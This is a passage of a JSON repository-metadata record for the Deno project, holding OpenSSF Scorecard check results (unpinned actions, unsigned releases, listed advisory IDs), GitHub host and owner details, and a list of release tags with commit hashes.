permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d0